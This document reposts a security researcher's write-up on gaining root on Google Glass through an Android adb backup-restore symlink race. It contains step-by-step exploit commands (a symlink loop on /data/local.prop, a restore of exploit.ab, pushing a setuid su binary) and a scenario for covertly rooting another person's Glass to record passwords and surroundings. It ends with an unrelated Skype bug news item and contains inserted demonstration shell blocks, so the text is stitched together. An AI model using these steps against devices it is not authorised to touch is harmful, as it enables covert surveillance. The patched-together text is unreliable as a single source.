Many people were rather confused by this (including a technical lead at Google who wrote "we intentionally left the device unlocked so you guys could hack it and do crazy fun shit with it. I mean, FFS, you paid $1500 for it... go to town on it"): the source code is supposed to be available, and so an unlocked bootloader should be sufficient. In this situation, however, it simply wasn't practical to use this route to get root.

How did you actually get root access?

At this point, I could have simply complained to Google in order to obtain the source code for the kernel. However, I expected that would take days (Google actually ended up posting the code within hours on Saturday, but that was under rather large public pressure), and I had no guarantee of even being successful (I am not certain the GPL applies to restricted releases; Glass isn't really publicly available yet; IANAL <- edit: a "Licensing & Compliance Manager" from the FSF reached out to me to clarify that "yes, the terms of the GNU GPL still apply").

To be very explicit: I was not bothered by this, nor did I complain about it on Twitter; if anything, I found it to be an interesting challenge. I like hacking on devices, and despite having an unlockable bootloader, it turns out that Glass posed a challenge to get the access required to modify its software. (Besides, as described in more detail later, I generally prefer not to unlock my bootloader.)

So, I decided I'd look to see if any known exploits would work on the device: Android devices tend not to get updates very quickly, and often come from the manufacturer running an old version of the operating system. This has allowed many devices that might otherwise be locked down to get hacked: universal exploits that work on every device running particular versions of Android have been surprisingly common. Last August, I had actually implemented an exploit for Android (mempodroid, using the mempodipper exploit described by Jason A.
Donenfeld, attacking a bug discovered by Jüri Aedla). Sadly, it was fixed in Android 4.0.3 (Glass runs 4.0.4). Thankfully, a Google search for "Android 4.0 root" turned up an article published by The Next Web from September about an exploit that affected all versions of Android 4.0.x. This exploit, which doesn't have a name (and so will be referred to indirectly), was developed by a hacker named Bin4ry. It isn't clear that it is "his exploit", though: he credits the idea to "Goroh_kun and tkymgr". It is Bin4ry's implementation, however, that I downloaded and analyzed: I needed to figure out how this exploit worked, to see if it would work on Glass, and if not, to adapt it until it would.

How does this exploit work?

The way it works is, humorously to me, somewhat similar to one of the first stages of the evasi0n exploit used to jailbreak iOS 6: it involves something called a "symlink traversal" that can be triggered while restoring a backup to the device. In the case of evasi0n, you constructed, modified, and restored multiple backups: one to set up the symlink, and the second to do the traversal. Here, we instead rely on a "race condition".

So, on Android, you can use adb to take a backup of the personal data associated with any installed package, and then later restore that data. When you restore the data, it first deletes all of the personal data that is already there, and then extracts the data that is stored in the backup. The backup itself is a compressed "tar" file (conceptually similar to a zip file, for people who haven't heard of tar).

To explain: a "symlink" (short for "symbolic link") is a special kind of file that isn't really a file at all: it is like a signpost that tells the computer to go use a different file instead. If you have a directory or folder that is a symlink to a different one, when you go into that folder you will end up in the one it refers to.
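The symlink-traversal idea can be demonstrated locally with nothing but tar. This is a harmless simulation, not the real exploit: every path here is a scratch directory created by mktemp, and "appdata"/"file99" are placeholder names echoing the ones used later. The key observation is that extraction through a pre-existing symlink redirects the archive's contents somewhere else.

```shell
# Local demonstration of extraction through a pre-existing symlink.
# All paths are throwaway scratch directories; nothing touches a device.
work=$(mktemp -d)
cd "$work"

# Build a "backup" archive containing the single member appdata/file99.
mkdir -p staging/appdata
echo "payload" > staging/appdata/file99
tar -C staging -cf backup.tar appdata/file99

# The victim directory: "appdata" is secretly a symlink pointing elsewhere.
mkdir -p extract target
ln -s "$work/target" extract/appdata

# Extraction resolves the path through the symlink: file99 lands in
# target/, not in extract/ where the extractor "thinks" it is writing.
tar -C extract -xf backup.tar
ls target/
```

This is exactly the property the restore process abuses: the extractor trusts the path inside the archive, and the filesystem quietly follows the planted link.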
If the backup is then extracted on top of a symlink, the files will end up in the wrong place. We can't place this symlink ahead of time, because the first step is to delete the old data. We also can't place it into the backup itself (as is done with evasi0n) because, even though that is possible in a tar file, the restore system on Android doesn't know what to do when it finds that special kind of file in the backup data. We thereby need to drop the symlink while the restore process is taking place.

We call this a "race condition", because we now have two activities racing to the same place, and depending on which one gets there first (the restore process, or our attempt to place the symlink), we may get either intended or problematic behavior. To make the timing more deterministic (ensuring we always win), we make the backup "very large", slowing down the restore and giving us more time.

The file we try to overwrite with our backup is /data/local.prop, which is stored on a part of the device that can be modified, but only if you are root. Inside this file, the goal is to place "ro.kernel.qemu=1", which will make the operating system believe that it is running not on real hardware, but instead on the emulator shipped by Google so that developers can test their apps more easily (a program called "qemu").

To make this work, we need to find a package that both allows its data to be restored from a backup (packages can opt out) and is owned by root (so that the backup is extracted as root, which is required in order to write to /data/local.prop). On most Android devices, the Settings application fits the bill. On Glass, there is no Settings, but we got lucky: the Glass Logging service satisfies both criteria.

If you do not own Glass, or are not interested in the technical how-to, I encourage you to skip the following section and continue below.

How can I use this exploit myself?
This exploit is simple enough that you can pull it off with just a couple of files, and without any specialized tooling. In order to proceed, you need only have the Android SDK (which comes with a copy of the adb utility) installed on your computer, and two files from me: exploit.ab (the exploit payload for use with adb restore) and su.

As this process involves doing a restore of the personal data stored for the Glass Logging service, we must first do a backup of any data that we already have stored for it (as it will be deleted). We do this using adb's backup command, to which we pass the name of a file in which to store the backed-up data and the name of the package we want to back up. In this case, that is "com.google.glass.logging".

$ adb backup -f backup.ab com.google.glass.logging

When we run this command, Glass will show a dialog (through the prism, so make certain you are wearing your device) verifying that we want to make this backup and asking if we would like the backup to be password protected. In this case, you should just use your Glass's touchpad to scroll to "Back up my data", and select it (by tapping). The command on your computer will then complete.

Our next step is to set up the race condition. As part of this exploit payload, a folder will be created in the data area for the Glass Logging service in which anyone, even the otherwise-restricted adb shell, will be able to create new files. We will run a command in the adb shell that will attempt to create the symlink, repeating over and over until it succeeds as the folder is created.

$ adb shell "while ! ln -s /data/local.prop \
    /data/data/com.google.glass.logging/a/file99 \
    2>/dev/null; do :; done"

While that is running (so leave it alone and open a new window), we now need to start the restore process of our modified backup payload. We do this using adb restore.
This command (which will exit immediately) will cause another dialog to appear on the display of Glass, so make certain you are still wearing your unit: you will need to scroll to and select the "Restore my data" option.

$ adb restore exploit.ab

After a few seconds, the previous command (the one attempting to place the symlink) should have completed. (As the timing on this is fairly deterministic, we can feel rather confident that it "worked", but if you want to make certain before proceeding, you should verify that /data/local.prop has now been placed on your device. If not, delete /data/data/com.google.glass.logging/a and try again.)

Before we proceed, we should restore the backup we made of the previous contents of the Glass Logging daemon. This not only cleans up any mess we left (such as the 50MB of backed-up files that we extracted as part of the restore), but also puts back the previous (potentially important) personal data for this system service. You will again need to approve this from the device.

$ adb restore backup.ab

At this point you should reboot your Glass. When it comes back up, there may be some errors displayed regarding the Bluetooth system having crashed or otherwise failed: this is because the emulator (which Glass now believes itself to be running inside of) does not support these features. We thereby need to copy our su binary to the device, make it privileged, undo our hack, and reboot.

$ adb reboot
$ adb shell "mount -o remount,rw /system"
$ adb push su /system/xbin
$ adb shell "chmod 6755 /system/xbin/su"
$ adb shell "rm /data/local.prop"
$ adb reboot

Now, when your device reboots, you should no longer get any errors. Your adb shell will also now be restricted as it was before, as the device no longer has our modified properties file. However, as we have installed "su" and marked it with the right privileges, you will be able to get root access whenever you need via adb.
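The retry loop used in the steps above (keep attempting the symlink until the restore creates the target directory) is a generic race-winning pattern, and it can be simulated entirely locally: here a plain mkdir stands in for the restore process, /etc/hosts stands in for /data/local.prop, and every path is a scratch directory.

```shell
# Simulate winning the race: a background loop keeps trying to plant a
# symlink inside a directory that does not exist yet; the moment the
# "restore" (here: mkdir) creates that directory, the symlink lands.
dir=$(mktemp -d)
( while ! ln -s /etc/hosts "$dir/a/file99" 2>/dev/null; do :; done ) &
racer=$!

sleep 0.2            # the racer is spinning; the directory is still absent
mkdir "$dir/a"       # the "restore process" creates the directory...
wait "$racer"        # ...and the racer immediately succeeds and exits

readlink "$dir/a/file99"   # -> /etc/hosts
```

On the device the same window is opened by the restore extracting a deliberately bloated backup, which is why making the backup "very large" makes the race essentially deterministic.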
You can now install more complex su utilities, and have some fun. If you do not own Glass, or were not interested in the technical details of using this exploit, you should continue reading at this point.

Should I now go unlock my bootloader?

This is up to you; many people would say "sure, that's what it is there for", but my recommendation is actually to avoid unlocking your bootloader unless you are left with no easy alternatives. You certainly do not need to unlock your bootloader right now: you already have root access. You can always unlock the bootloader if you ever decide you need or want to: you don't have to make this decision right now.

As mentioned earlier, the process will delete all of the data on your device, which might be irritating (you will lose your timeline, and have to reconfigure everything). The device also displays its status (locked, unlocked, or, on some devices, "re-locked"), allowing the manufacturer to easily deny warranty service to your device. Finally, I'm going to argue that you will want to re-lock it anyway.

The process of re-locking your device is similar to unlocking it: "fastboot oem lock", and the device is immediately "re-locked". On some devices (not the Nexus 4 I tested), this state is separate from "locked", allowing the manufacturer to know it was previously unlocked. With a re-locked bootloader, you can keep running your modified software, but you cannot use fastboot to modify it again without re-unlocking.

The reason you would want to do this is that while your device has an unlocked bootloader, you have no way to be confident that your operating system hasn't been modified by someone while it was outside of your control. This is because anyone can, after booting your bootloader-unlocked Android device into fastboot, boot or flash any custom image they want. It doesn't matter how secure the operating system is: fastboot is accessible.
You might think you would notice if someone installed a different version of Android on your device, but the attacker needs only modify your existing software: they can access the device's filesystem and install a slightly modified version of any of the software you might use. On many Android devices there are security mechanisms to guard your private data, but the system software is left unencrypted and can be modified.

Why do you consider that a problem?

This means that if you leave your device in someone else's hands, and it has an unlocked bootloader, with just a minute alone they can access anything you have stored on it. While on most Android devices there is a PIN code that protects your personal data (encrypting it, as of Android 4.0), it doesn't take long to programmatically try every possible PIN code (on iOS, the four-digit code takes ten minutes to crack). That said, getting ten minutes alone with your device might be more difficult than getting just a minute.

Sadly, they don't actually need all that time: all they need to do is modify your device to automatically upload all of your contacts to a server the next time you pick it up and start using it. They can even leave software that allows them to remotely access it at any time, getting your location or even taking pictures.

(One way of looking at this, for readers with a background in iOS attacks, is that unlocking your bootloader using "fastboot oem unlock" can be thought of as opening up an exploitable bug in your bootrom; the things you can do to a device that has had its bootloader unlocked are comparable to the things you can do to an iOS device susceptible to the limera1n bootrom exploit, such as an iPhone 4.)

The way you are normally protected from this is that, in order to use fastboot to steal your data, the bootloader must be unlocked, and the process of unlocking the bootloader deletes all of your data.
(So, if you were wondering earlier why that feature requires you to delete all of your data, this is why: it is to protect you from malicious people unlocking your device, booting a custom image, and brute-forcing your PIN.) The result is that when you get your device back (which might be as simple as returning from the bathroom after leaving it on the table at dinner), it will be painfully obvious it has been modified: all your data will be gone, and when you boot the device it will show the "unlock of shame". It kind of sucks that it is so easy for someone to delete your data and void your warranty over USB, but at least you noticed.

OK, and if I don't do that, I'm safe?

Sadly, due to the way Glass is currently designed, it is particularly susceptible to the kinds of security issues that tend to plague Android devices. The one saving grace of Android's track record on security is that most of the bugs people find in it cannot be exploited while the device is PIN-code locked. Google's Glass, however, does not have any kind of PIN mechanism: when you turn it on, it is immediately usable.

Even if you wear Glass constantly, you are unlikely to either sleep or shower while wearing it; most people, of course, probably will not wear it constantly: it is likely to be left alone for long periods of time. If you leave it somewhere where someone else can get it, it is easy to put the device into Debug Mode using the Settings panel and then use adb access to launch into a security exploit to get root.

The person doing this does not even need to be left alone with the device: it would not be difficult to use another Android device in your pocket to launch the attack (rather than a full computer). A USB "On-The-Go" cable could run from your pocket, under your shirt, to your right sleeve. With only some momentary sleight of hand, one could "try on" your Glass, and install malicious software in the process.
You might think that security exploits are rare, but most versions of Android have been subject to these kinds of attacks; again, these are often seen as somewhat low priority because most require the device's PIN code to be entered (manually, by hand, not via computer, so cracking the code is not an option). In fact, as we have seen, Glass even managed to ship with a security bug that was known eight months ago.

What can someone do via my Glass?

Once the attacker has root on your Glass, they have much more power than if they had access to your phone or even your computer: they have control over a camera and a microphone that are attached to your head. A bugged Glass doesn't just watch your every move: it watches everything you are looking at (intentionally or furtively) and hears everything you do. The only thing it doesn't know are your thoughts.

The obvious problem, of course, is that you might be using it in fairly private situations. Yesterday, Robert Scoble demonstrated on his Google+ feed that it survived being in the shower with him. Thankfully (for him, and possibly for us), this extreme dedication to around-the-clock usage of Glass also protects him from malicious attacks: good luck getting even a minute alone with his hardware ;P.

However, a more subtle issue is that, in a way, it also hacks into every device you interact with. It knows all your passwords, for example, as it can watch you type them. It even manages to monitor your usage of otherwise safe, old-fashioned technology: it watches you enter door codes, it takes pictures of your keys, and it records what you write using pen and paper. Nothing is safe once your Glass has been hacked.

What should Google do about this?

For starters, they should have some kind of protection on your Glass that activates when you take it off.
If the detector along the inside of the device is a camera (I am not certain whether it is a camera or a light sensor), it might be possible to use some kind of eye-based biometric. Another option is a voiceprint. Otherwise, a simple PIN code would suffice: the user could enter it using the touchpad when they put the device on.

Secondly, they should provide some way for the user to feel confident, in a given situation, that the device could not possibly be recording: a really great suggestion from a friend of mine is that the camera could have a little sliding plastic shield. (This also addresses the privacy concerns many have about a future where large numbers of people have Glass: it makes it clear "I'm not recording right now".)

Finally, they should be a little more careful while discussing these issues with the community. In response to one of the articles written about my post, a Google engineer (who claims to have not read the article and was making a "joke" based only on the title) stated "This is not rooting. Nothing is rooted. There is no root here! This is 'fastboot oem unlock'.", which accidentally derailed the conversation. As an example, in an article published by Ars Technica, the situation had gotten so confused by such statements from Google employees (which included comments like "Yes, Glass is hackable. Duh.") that Ars ended up reporting that "there's been some debate over whether developers actually gained root access to the devices or simply took advantage of a 'fastboot OEM unlock' that Google itself provided".

As long as engineers, advocates, and officers from Google make statements like these without carefully looking into the facts first, it will not be possible to have any kind of reasonable and informed discussion about this system. The doors that Google is attempting to open with Glass are simply too large, and the effects too wide-reaching, for these kinds of off-the-cuff statements to be allowed to dominate the discussion.
Source: Exploiting a Bug in Google's Glass - Jay Freeman (saurik)

Personal thoughts: Should I add that Google still has a few problems to solve with these glasses, yet they want to kick off mass production? Are we slowly starting to become "robotized" and, to some extent, monitored? Some say Facebook is already too much, but what will they say about this?
  13. Skype privacy bug that can Send Messages To The Wrong Contacts

Posted On 7/18/2012 01:02:00 AM By THN Security Analyst

What if, when you sent a message to someone, it had a very good chance of going to someone else in your contact list? That would be pretty scary, right? That is what some Skype users are reporting. The bug was first discussed in Skype's user forums, and seems to have followed a June 2012 update of the Skype software. Skype has confirmed the bug's existence and that a fix is in the works. However, the company characterizes the bug as "rare."

Purchased by Microsoft last year for $8.5 billion, the Luxembourg-based company, which has as many as 40 million people using its service at a time during peak periods, explained that messages sent between two users were in limited cases being copied to a third party, but did not elaborate further on the matter. Five other users of the Microsoft-owned program confirmed that they were also seeing instant messages being sent to the wrong person from their contact list. Sometimes it's just a few messages, while other times it's a whole conversation.

Skype has, on its blog, confirmed the issue of a bug sending instant messages to wrong contacts and has promised a fix. Addressing the issue, Skype wrote, "Based on recent Skype customer forum posts and our own investigation over the past couple of days, we have identified a bug that we are working hard to fix."

Skype privacy bug that can Send Messages To The Wrong Contacts : The Hacker News ~ http://thehackernews.com/2012/07/skype-privacy-bug-that-can-send.html